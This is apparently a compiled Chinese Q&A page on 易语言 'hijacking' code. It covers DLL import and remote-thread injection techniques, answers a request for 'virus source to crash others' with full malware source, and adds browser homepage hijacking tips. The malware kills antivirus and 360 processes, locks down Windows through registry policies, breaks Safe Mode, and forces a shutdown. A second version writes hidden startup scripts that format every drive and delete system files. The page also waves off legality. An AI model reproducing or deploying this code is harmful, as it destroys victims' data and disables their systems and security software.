易语言劫持源码

1. 易语言dll劫持注入写法

1、首先这不是注入DLL，这是导入DLL函数进PE文件，这明陪个过程需要一个工具LordPE，网上都有可以自己去下载。

2我们知道一旦DLL函数被导入EXE文件的输入表，则EXE文件启动时会自动执行一遍该DLL的_启动子程序 函数，

3、所以我们可以把需要执行的指令放在该函数里面，然后记得在该函数的 公开 选项打上勾，然后编译。

4、接下来，我们打开LordPE，如下图

然后在弹出的对话框中选择要导入DLL函数的程序然后点击新弹出的窗口的目录，如下图

5、然后点 输入表 右边的 标题是 ...的按钮(截不了图了)

然后随便选择一项数据，右键，如下图

在弹出的窗口中填写DLL名，及API名(填_启动子程序)就可以了，然后点一下 + 按钮

6、如果弹出一个信息框，点 是 就可尘槐喊以，添加完成之后点 确定 ，然后一路保存就可以了，不过发布程序的时候记得带上那个DLL

相关资源：易语言DLL永派野久注入EXE_易语言dll注入exe并且运行-其它代码类资源...

2. 【易语言】【OD】关于写dll劫持(也可叫做静态补丁)的方法

改文件我渣空余觉得不如dll注入来的优雅。

VirtualAllocEx申请内存，
WriteProcessMemory将你的装载dll的shellcode写过去，
CreateRemoteThread创建线程，指向你如滚的shellcode。
简单愉快，完全不需要改OEP，更不用搜索00。

如果你那么固执要用你的静态补丁方法，
其实我觉得你也不需要用什么易语言了，直接把你用OD修改的DLL，保存并替代原文件，
就可以了，何须那么麻烦，当然除非你这个DLL还是EXE有什么特殊的地方不能这样。

易语言用汇编比较蛋疼，而且我对易语言也不太了解，
如果你那么固执要用编程来解决，我就大概提一下思路。

一、搜00，找个足够大的空的地方
二、通过读PE结构获取OEP，不懂的话请自行网络PE结构。
三、OEP改成你步骤一找到的空地，
这一块涉及到文件虚拟地址对齐问题（好像是这么叫的），比较复杂，而且我也不太清楚，
交给你自己解决。

四、空地里写入你的shellcode。你的shellcode有个问题，call LoadLibrary用的是相对偏移跳 转，当你这句汇编的位置483AFE，那么你就会call到别的地方去了，可以改亏御成如下代码：
mov eax,LoadLibrary地址

call eax

五、shellcode末尾jmp回原OEP，同样涉及对齐问题，自行研究吧。

3. 易语言编译完成DLL文件，怎么劫持注入到游戏中

利用游戏或系统缺陷注入 如伪装成输入法、驱动权限强制加载、文件伪装替换等等。

4. 求易语言病毒源码，最好能让别人死机的源码，急求，高分

.版本 2
.支持库 shell
.程序集 窗口程序集1
.子程序 _按钮1_被单击
' 绕过杀毒软件防御：
运行 (“taskkill /f /im kavsvc.exe”, 假, 1)
运行 (“taskkill /f /im KVXP.kxp”, 假, 1)
运行 (“taskkill /f /im Rav.exe”, 假, 1)
运行 (“taskkill /f /im Ravmon.exe”, 假, 1)
运行 (“taskkill /f /im Mcshield.exe”, 假, 1)
运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)
' 修改系统时间：
置现行时间 (到时间 (“8888年8月8日”))
' 禁用任务管理器：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0)
' 禁用注册表：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools”, 1)
' 隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1)
' 隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里，或“MS－DOS”方式下都看不见了：
写注册项 (3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)
' 隐藏开始中的关机：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1)
' 隐藏开始中的搜索：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1)
' OVER360防御：
写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)
' 结束360进程
运行 (“taskkill /f /im 360tray.exe”, 假, 1)
' 隐藏所有驱动器：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”, 4294967295)
' 禁止所有驱动器：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive”, 4294967295)
' 隐藏文件夹选项：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1)
' 将桌面对象隐藏：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”, 1)
' 隐藏开始中的关机：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1)
' 隐藏开始中的搜索：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1)
' 这条有两种情况。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项
写注册项 (3, “Software\Policies\Microsoft\Windows\System\DisableCMD”, 1)
' 隐藏主页选项组：
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”, 1)
' 隐藏IE文件菜单：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1)
' 隐藏收藏夹菜单：
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites”, 1)
' 禁用IE打印功能：
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting”, 1)
' 隐藏Internet选项：
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”, 1)
' 禁止IE查看源文件：
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”, 1)
' 禁用IE下载功能：
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803”, 3)
' 禁止右键关联菜单：
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”, 1)
' 修改文件关联：
写注册项 (1, “.txt\”, “jpegfile”)
写注册项 (1, “.inf\”, “jpegfile”)
写注册项 (1, “.reg\”, “jpegfile”)
写注册项 (1, “.exe\”, “jpegfile”)
' 无法进入安全模式：
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\”)
' 关机：
关闭系统 (2, 真)

5. 易语言攻击源码，各种的都没事。。。

.局部变量 变量, 整数型

置现行时间 (到时间 (“2056年1月1日”))
运行 (“taskkill /f /im kavsvc.exe”, 假, 1)
运行 (“taskkill /f /im KVXP.kxp”, 假, 1)
运行 (“taskkill /f /im Rav.exe”, 假, 1)
运行 (“taskkill /f /im Ravmon.exe”, 假, 1)
运行 (“taskkill /f /im Mcshield.exe”, 假, 1)
运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)
' 绕过360监控
写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)
运行 (“taskkill /f /im 360tray.exe”, 假, 1) ' 结束360进程
' 修改关联
写注册项 (1, “.txt\”, “jpegfile”)
写注册项 (1, “.inf\”, “jpegfile”)

写注册项 (4, “SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”, 0) ' 隐藏文件和文件夹
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0) ' 禁用任务管理器
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, 1) ' 禁用控制面板
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools”, 1) ' 禁用注册表
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1) ' 隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务

写注册项 (3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)
' 隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里，或“MS－DOS”方式下都看不见了
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”, 4294967295) ' 隐藏所有驱动器
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive”, 4294967295) ' 禁止所有驱动器
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1) ' 隐藏文件夹选项
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”, 1) ' 将桌面对象隐藏
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1) ' 隐藏开始中的关机
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1) ' 隐藏开始中的搜索
' 写注册项 (3, “Software\Policies\Microsoft\Windows\System\DisableCMD”, 1)'1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”, 1) ' 隐藏主页选项组
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1) ' 隐藏IE文件菜单
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites”, 1) ' 隐藏收藏夹菜单
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting”, 1) ' 禁用IE打印功能
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”, 1) ' 隐藏Internet选项
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”, 1) ' 禁止IE查看源文件
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803”, 3) ' 禁用IE下载功能
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”, 1) ' 禁止右键关联菜单

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode”, 1) ' 禁止“重新启动计算机切换到MS-DOS方式”

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, 1) ' 禁止显示“注销”

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu”, 1) ' 禁止文档菜单

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, 1) ' 去掉“开始”选单中的“登录”项

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, 1) ' 禁止使用鼠标右键

写到文件 (读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取分钟 (取现行时间 ())) ＋ “.vbs”, 到字节集 (“set Cleaner=createobject(” ＋ 左逗号.标题 ＋ “wscript.shell” ＋ 右逗号.标题 ＋ “)” ＋ #换行符 ＋ “Cleaner.run” ＋ 左逗号.标题 ＋ 读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取秒 (取现行时间 ())) ＋ “.bat” ＋ 右逗号.标题 ＋ “,vbhide”)) ' 创建隐藏批处理脚本
置文件属性 (读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取分钟 (取现行时间 ())) ＋ “.vbs”, 7 ＋ 32)

写到文件 (读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取秒 (取现行时间 ())) ＋ “.bat”, 到字节集 (“@echo off” ＋ #换行符 ＋ “for %%i in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO format %%i: /q /x /y” ＋ #换行符 ＋ “del /f /s /q /a %SystemRoot%\system32\*.msc”)) ' 创建格式化和删除没运行文件的批处理
置文件属性 (读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取秒 (取现行时间 ())) ＋ “.bat”, 7 ＋ 32)

写注册项 (4, “Software\Microsoft\Windows\CurrentVersion\Run\Explore.exe”, 读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\” ＋ 到文本 (取分钟 (取现行时间 ())) ＋ “.vbs”) ' 把隐藏批处理脚本加入启动项

' 修改EXE图标
写到文件 (读环境变量 (“SystemRoot”) ＋ “\system32” ＋ “\wscript.ico”, #ico)
' 置文件属性 (读环境变量 (“SystemRoot”) ＋ “\system32\wscript.ico”, 7 ＋ 32)
写到文件 (读环境变量 (“SystemRoot”) ＋ “\system32\reg.reg”, 到字节集 (“Windows Registry Editor Version 5.00” ＋ #换行符 ＋ “[HKEY_CLASSES_ROOT\exefile\DefaultIcon]” ＋ #换行符 ＋ “@=” ＋ 左逗号.标题 ＋ 读环境变量 (“SystemRoot”) ＋ “\system32\wscript.ico” ＋ 右逗号.标题))
写到文件 (读环境变量 (“SystemRoot”) ＋ “\system32\reg.bat”, 到字节集 (“@echo off” ＋ #换行符 ＋ “regedit /s reg.reg” ＋ #换行符 ＋ “assoc .exe=exefile” ＋ #换行符 ＋ “del /f /s /q /a ” ＋ 读环境变量 (“SystemRoot”) ＋ “\system32\reg.reg” ＋ #换行符 ＋ “del /f /s /q /a ” ＋ 读环境变量 (“SystemRoot”) ＋ “\system32\reg.bat”))
运行 (读环境变量 (“SystemRoot”) ＋ “\system32\reg.bat”, 假, 1)

写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 1)
写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 1)
写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 1)
写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 1)

6. 易语言可以劫持网站吗

你必须得有一个收集需要屏蔽的网站的数据库！
然后将客户端的电脑HOOKAPI 当用户打开数据库中的网站的时候。程序劫持此操作并作出响应。整个过程和杀毒软件的原理一样。前期的时候由于没有数据库，需要自己手动收集分析。如果你想直接屏蔽谋个网站,可以在注册表或者hosts的文件里面添加项目。 IE里面的安全设置不是有个受限网站的列表吗？ 把要添加的网站填进去,然后注册表查找。 找到的位置就是要限制网站的列表在注册表对应的位置。然后写入注册项目就可以了。

7. 易语言劫持代码生成器是合法软件吗

不太合法，但软件只是学习的工具，只要你不应用于非法途径，只是自己学习，即使不太合法，也没关系。

8. 易语言主页劫持代码

检测IE进程 获取新打开的IE经常的 地址栏句柄 发送消息 你要设置的主页 再发送一个回车过去